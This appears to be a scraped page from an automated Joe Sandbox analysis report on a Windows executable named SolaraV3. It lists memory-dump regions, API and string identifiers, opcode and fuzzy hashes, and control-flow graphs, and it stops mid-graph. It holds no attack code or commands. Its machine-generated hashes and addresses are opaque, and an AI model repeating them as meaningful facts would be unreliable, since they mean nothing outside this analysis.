                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                                                                                                                                                                                              • API String ID: 0-352295518
                                                                                                                                                                                                                              • Opcode ID: 5e87cf92e6c0c5c040c4c8738623b61db905078f7f9d67d15add37452dcc21b3
                                                                                                                                                                                                                              • Instruction ID: d112e624c17a4925d0806c78fd23bd7083fce9e90fc9fe77280b88a8fcf2ca07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e87cf92e6c0c5c040c4c8738623b61db905078f7f9d67d15add37452dcc21b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E728DF2A286428AFB688E25D449FBE27A0EF44B88F148135DA4D4B7D5DF7DD580C708

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 723 7ff6dc726964-7ff6dc7269d7 call 7ff6dc726698 726 7ff6dc7269d9-7ff6dc7269e2 call 7ff6dc714ee8 723->726 727 7ff6dc7269f1-7ff6dc7269fb call 7ff6dc718520 723->727 734 7ff6dc7269e5-7ff6dc7269ec call 7ff6dc714f08 726->734 732 7ff6dc726a16-7ff6dc726a7f CreateFileW 727->732 733 7ff6dc7269fd-7ff6dc726a14 call 7ff6dc714ee8 call 7ff6dc714f08 727->733 736 7ff6dc726afc-7ff6dc726b07 GetFileType 732->736 737 7ff6dc726a81-7ff6dc726a87 732->737 733->734 746 7ff6dc726d32-7ff6dc726d52 734->746 739 7ff6dc726b09-7ff6dc726b44 GetLastError call 7ff6dc714e7c CloseHandle 736->739 740 7ff6dc726b5a-7ff6dc726b61 736->740 742 7ff6dc726ac9-7ff6dc726af7 GetLastError call 7ff6dc714e7c 737->742 743 7ff6dc726a89-7ff6dc726a8d 737->743 739->734 757 7ff6dc726b4a-7ff6dc726b55 call 7ff6dc714f08 739->757 747 7ff6dc726b69-7ff6dc726b6c 740->747 748 7ff6dc726b63-7ff6dc726b67 740->748 742->734 743->742 750 7ff6dc726a8f-7ff6dc726ac7 CreateFileW 743->750 754 7ff6dc726b6e 747->754 755 7ff6dc726b72-7ff6dc726bc7 call 7ff6dc718438 747->755 748->755 750->736 750->742 754->755 762 7ff6dc726be6-7ff6dc726c17 call 7ff6dc726418 755->762 763 7ff6dc726bc9-7ff6dc726bd5 call 7ff6dc7268a0 755->763 757->734 769 7ff6dc726c19-7ff6dc726c1b 762->769 770 7ff6dc726c1d-7ff6dc726c5f 762->770 763->762 768 7ff6dc726bd7 763->768 771 7ff6dc726bd9-7ff6dc726be1 call 7ff6dc71aac0 768->771 769->771 772 7ff6dc726c81-7ff6dc726c8c 770->772 773 7ff6dc726c61-7ff6dc726c65 770->773 771->746 776 7ff6dc726d30 772->776 777 7ff6dc726c92-7ff6dc726c96 772->777 773->772 775 7ff6dc726c67-7ff6dc726c7c 773->775 775->772 776->746 777->776 779 7ff6dc726c9c-7ff6dc726ce1 CloseHandle CreateFileW 777->779 780 7ff6dc726d16-7ff6dc726d2b 779->780 781 7ff6dc726ce3-7ff6dc726d11 GetLastError call 7ff6dc714e7c call 7ff6dc718660 779->781 780->776 781->780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction ID: 1f658a21a2cf1cc71e7a8a535b4a0c0e3411f9669a95ad32ae96509cf338d8e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFC1B136B28A4A85EB20CFA9C4A16AC7761F749B98F115237DE1E977D4CF38D466C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: pkey_poly1305_init$wB5
                                                                                                                                                                                                                              • API String ID: 3300690313-1105255960
                                                                                                                                                                                                                              • Opcode ID: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                                                                                                                                                                                              • Instruction ID: a7c6578fcf0f44d8be7975705469039e8972fed6c7b0d48d342d8cfe319a5427
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 586537f4082271bd79903f91da2f6e0ac042010b88824cea82960b6bec6abf0e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 586226A66281928BE7198E39D40067977D0F748789F14953AEE9FC37D4EA3CEE45CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction ID: 82ed977e490c0724387f4112aa077d80b004f8bc2e4f685765b5bb3ec7dbbf20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6F06822A1C74686F7708B64F49976E7360AB84778F444336DA6E426D4DF3CD06ADB04

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 525 7ff6dc701950-7ff6dc70198b call 7ff6dc7045c0 528 7ff6dc701991-7ff6dc7019d1 call 7ff6dc707f90 525->528 529 7ff6dc701c4e-7ff6dc701c72 call 7ff6dc70c550 525->529 534 7ff6dc701c3b-7ff6dc701c3e call 7ff6dc71004c 528->534 535 7ff6dc7019d7-7ff6dc7019e7 call 7ff6dc7106d4 528->535 539 7ff6dc701c43-7ff6dc701c4b 534->539 540 7ff6dc7019e9-7ff6dc701a03 call 7ff6dc714f08 call 7ff6dc702910 535->540 541 7ff6dc701a08-7ff6dc701a24 call 7ff6dc71039c 535->541 539->529 540->534 547 7ff6dc701a45-7ff6dc701a5a call 7ff6dc714f28 541->547 548 7ff6dc701a26-7ff6dc701a40 call 7ff6dc714f08 call 7ff6dc702910 541->548 555 7ff6dc701a5c-7ff6dc701a76 call 7ff6dc714f08 call 7ff6dc702910 547->555 556 7ff6dc701a7b-7ff6dc701afc call 7ff6dc701c80 * 2 call 7ff6dc7106d4 547->556 548->534 555->534 567 7ff6dc701b01-7ff6dc701b14 call 7ff6dc714f44 556->567 570 7ff6dc701b35-7ff6dc701b4e call 7ff6dc71039c 567->570 571 7ff6dc701b16-7ff6dc701b30 call 7ff6dc714f08 call 7ff6dc702910 567->571 576 7ff6dc701b50-7ff6dc701b6a call 7ff6dc714f08 call 7ff6dc702910 570->576 577 7ff6dc701b6f-7ff6dc701b8b call 7ff6dc710110 570->577 571->534 576->534 585 7ff6dc701b9e-7ff6dc701bac 577->585 586 7ff6dc701b8d-7ff6dc701b99 call 7ff6dc702710 577->586 585->534 589 7ff6dc701bb2-7ff6dc701bb9 585->589 586->534 590 7ff6dc701bc1-7ff6dc701bc7 589->590 592 7ff6dc701be0-7ff6dc701bef 590->592 593 7ff6dc701bc9-7ff6dc701bd6 590->593 592->592 594 7ff6dc701bf1-7ff6dc701bfa 592->594 593->594 595 7ff6dc701c0f 594->595 596 7ff6dc701bfc-7ff6dc701bff 594->596 598 7ff6dc701c11-7ff6dc701c24 595->598 596->595 597 7ff6dc701c01-7ff6dc701c04 596->597 597->595 599 7ff6dc701c06-7ff6dc701c09 597->599 600 7ff6dc701c2d-7ff6dc701c39 598->600 601 7ff6dc701c26 598->601 599->595 602 7ff6dc701c0b-7ff6dc701c0d 599->602 600->534 600->590 601->600 602->598
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC707F90: _fread_nolock.LIBCMT ref: 00007FF6DC70803A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF6DC701A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 7ff6665c9b0233f84a18604e2f93f6aad3fd35cfb1582bdde42a7b36d7225fce
                                                                                                                                                                                                                              • Instruction ID: 48af358b863a094ba1041e37a2b0a7fbe8ac0a8961aae4652bcf3dc32a0cab23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ff6665c9b0233f84a18604e2f93f6aad3fd35cfb1582bdde42a7b36d7225fce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D81C171A0868A8AEB20DB25D0502BE73B0FF48784F444437E98EC7799DE3DE5A79740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: 2722edef0781604a165103895e19a331bfd717a97205d6b635aa91ec701c358f
                                                                                                                                                                                                                              • Instruction ID: b9ba899871d3670b54bf3b53ad20f490e73dd59220c7877a26ded39d0d834774
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2722edef0781604a165103895e19a331bfd717a97205d6b635aa91ec701c358f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA41A132B0864A8AEB11DB22D4505BDA3A0FF44794F445533ED4E8BB99DE3DE563D700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 786 7ff6dc701210-7ff6dc70126d call 7ff6dc70bd80 789 7ff6dc70126f-7ff6dc701296 call 7ff6dc702710 786->789 790 7ff6dc701297-7ff6dc7012af call 7ff6dc714f44 786->790 795 7ff6dc7012d4-7ff6dc7012e4 call 7ff6dc714f44 790->795 796 7ff6dc7012b1-7ff6dc7012cf call 7ff6dc714f08 call 7ff6dc702910 790->796 802 7ff6dc701309-7ff6dc70131b 795->802 803 7ff6dc7012e6-7ff6dc701304 call 7ff6dc714f08 call 7ff6dc702910 795->803 807 7ff6dc701439-7ff6dc70146d call 7ff6dc70ba60 call 7ff6dc714f30 * 2 796->807 806 7ff6dc701320-7ff6dc701345 call 7ff6dc71039c 802->806 803->807 815 7ff6dc701431 806->815 816 7ff6dc70134b-7ff6dc701355 call 7ff6dc710110 806->816 815->807 816->815 822 7ff6dc70135b-7ff6dc701367 816->822 824 7ff6dc701370-7ff6dc701398 call 7ff6dc70a1c0 822->824 827 7ff6dc70139a-7ff6dc70139d 824->827 828 7ff6dc701416-7ff6dc70142c call 7ff6dc702710 824->828 829 7ff6dc701411 827->829 830 7ff6dc70139f-7ff6dc7013a9 827->830 828->815 829->828 832 7ff6dc7013d4-7ff6dc7013d7 830->832 833 7ff6dc7013ab-7ff6dc7013b9 call 7ff6dc710adc 830->833 834 7ff6dc7013ea-7ff6dc7013ef 832->834 835 7ff6dc7013d9-7ff6dc7013e7 call 7ff6dc729e30 832->835 839 7ff6dc7013be-7ff6dc7013c1 833->839 834->824 838 7ff6dc7013f5-7ff6dc7013f8 834->838 835->834 841 7ff6dc70140c-7ff6dc70140f 838->841 842 7ff6dc7013fa-7ff6dc7013fd 838->842 843 7ff6dc7013c3-7ff6dc7013cd call 7ff6dc710110 839->843 844 7ff6dc7013cf-7ff6dc7013d2 839->844 841->815 842->828 845 7ff6dc7013ff-7ff6dc701407 842->845 843->834 843->844 844->828 845->806
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: cbab2ef2869479c63bdcf1634fcbff65c3765535ea95b620844ade9d20866f24
                                                                                                                                                                                                                              • Instruction ID: 86cdcb7e46f9813f34b6f86ac8c5fc4ab10b663316dd619ccc43144b47be829d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbab2ef2869479c63bdcf1634fcbff65c3765535ea95b620844ade9d20866f24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05510822B0864A86E6219B16E4503BEA2A1FF84794F484137ED4EC77D9EF3DE563D700

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF6DC703804), ref: 00007FF6DC7036EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC702C50: MessageBoxW.USER32 ref: 00007FF6DC702D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction ID: 8e8d371c739a9d7afba1c888563e93fcc3cfd58bc6cd68cabf098d7fbe29a052
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21C461F1C64A41FE319726E8603BE6260BF98355F804133E66DC26D5EE2DE127D740

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1280 7ff6dc71ba5c-7ff6dc71ba82 1281 7ff6dc71ba9d-7ff6dc71baa1 1280->1281 1282 7ff6dc71ba84-7ff6dc71ba98 call 7ff6dc714ee8 call 7ff6dc714f08 1280->1282 1283 7ff6dc71be77-7ff6dc71be83 call 7ff6dc714ee8 call 7ff6dc714f08 1281->1283 1284 7ff6dc71baa7-7ff6dc71baae 1281->1284 1296 7ff6dc71be8e 1282->1296 1303 7ff6dc71be89 call 7ff6dc71a8e0 1283->1303 1284->1283 1286 7ff6dc71bab4-7ff6dc71bae2 1284->1286 1286->1283 1289 7ff6dc71bae8-7ff6dc71baef 1286->1289 1292 7ff6dc71bb08-7ff6dc71bb0b 1289->1292 1293 7ff6dc71baf1-7ff6dc71bb03 call 7ff6dc714ee8 call 7ff6dc714f08 1289->1293 1299 7ff6dc71bb11-7ff6dc71bb17 1292->1299 1300 7ff6dc71be73-7ff6dc71be75 1292->1300 1293->1303 1301 7ff6dc71be91-7ff6dc71bea8 1296->1301 1299->1300 1304 7ff6dc71bb1d-7ff6dc71bb20 1299->1304 1300->1301 1303->1296 1304->1293 1307 7ff6dc71bb22-7ff6dc71bb47 1304->1307 1309 7ff6dc71bb49-7ff6dc71bb4b 1307->1309 1310 7ff6dc71bb7a-7ff6dc71bb81 1307->1310 1313 7ff6dc71bb4d-7ff6dc71bb54 1309->1313 1314 7ff6dc71bb72-7ff6dc71bb78 1309->1314 1311 7ff6dc71bb56-7ff6dc71bb6d call 7ff6dc714ee8 call 7ff6dc714f08 call 7ff6dc71a8e0 1310->1311 1312 7ff6dc71bb83-7ff6dc71bbab call 7ff6dc71d5fc call 7ff6dc71a948 * 2 1310->1312 1342 7ff6dc71bd00 1311->1342 1345 7ff6dc71bbc8-7ff6dc71bbf3 call 7ff6dc71c284 1312->1345 1346 7ff6dc71bbad-7ff6dc71bbc3 call 7ff6dc714f08 call 7ff6dc714ee8 1312->1346 1313->1311 1313->1314 1316 7ff6dc71bbf8-7ff6dc71bc0f 1314->1316 1319 7ff6dc71bc8a-7ff6dc71bc94 call 7ff6dc72391c 1316->1319 1320 7ff6dc71bc11-7ff6dc71bc19 1316->1320 1331 7ff6dc71bc9a-7ff6dc71bcaf 1319->1331 1332 7ff6dc71bd1e 1319->1332 1320->1319 1324 7ff6dc71bc1b-7ff6dc71bc1d 1320->1324 1324->1319 1328 7ff6dc71bc1f-7ff6dc71bc35 1324->1328 1328->1319 1333 7ff6dc71bc37-7ff6dc71bc43 1328->1333 1331->1332 1337 7ff6dc71bcb1-7ff6dc71bcc3 GetConsoleMode 1331->1337 1335 7ff6dc71bd23-7ff6dc71bd43 ReadFile 1332->1335 1333->1319 1338 7ff6dc71bc45-7ff6dc71bc47 1333->1338 1340 7ff6dc71bd49-7ff6dc71bd51 1335->1340 1341 7ff6dc71be3d-7ff6dc71be46 GetLastError 1335->1341 1337->1332 1343 7ff6dc71bcc5-7ff6dc71bccd 1337->1343 1338->1319 1344 7ff6dc71bc49-7ff6dc71bc61 1338->1344 1340->1341 1348 7ff6dc71bd57 1340->1348 1351 7ff6dc71be48-7ff6dc71be5e call 7ff6dc714f08 call 7ff6dc714ee8 1341->1351 1352 7ff6dc71be63-7ff6dc71be66 1341->1352 1353 7ff6dc71bd03-7ff6dc71bd0d call 7ff6dc71a948 1342->1353 1343->1335 1350 7ff6dc71bccf-7ff6dc71bcf1 ReadConsoleW 1343->1350 1344->1319 1354 7ff6dc71bc63-7ff6dc71bc6f 1344->1354 1345->1316 1346->1342 1358 7ff6dc71bd5e-7ff6dc71bd73 1348->1358 1360 7ff6dc71bcf3 GetLastError 1350->1360 1361 7ff6dc71bd12-7ff6dc71bd1c 1350->1361 1351->1342 1355 7ff6dc71bcf9-7ff6dc71bcfb call 7ff6dc714e7c 1352->1355 1356 7ff6dc71be6c-7ff6dc71be6e 1352->1356 1353->1301 1354->1319 1364 7ff6dc71bc71-7ff6dc71bc73 1354->1364 1355->1342 1356->1353 1358->1353 1367 7ff6dc71bd75-7ff6dc71bd80 1358->1367 1360->1355 1361->1358 1364->1319 1365 7ff6dc71bc75-7ff6dc71bc85 1364->1365 1365->1319 1372 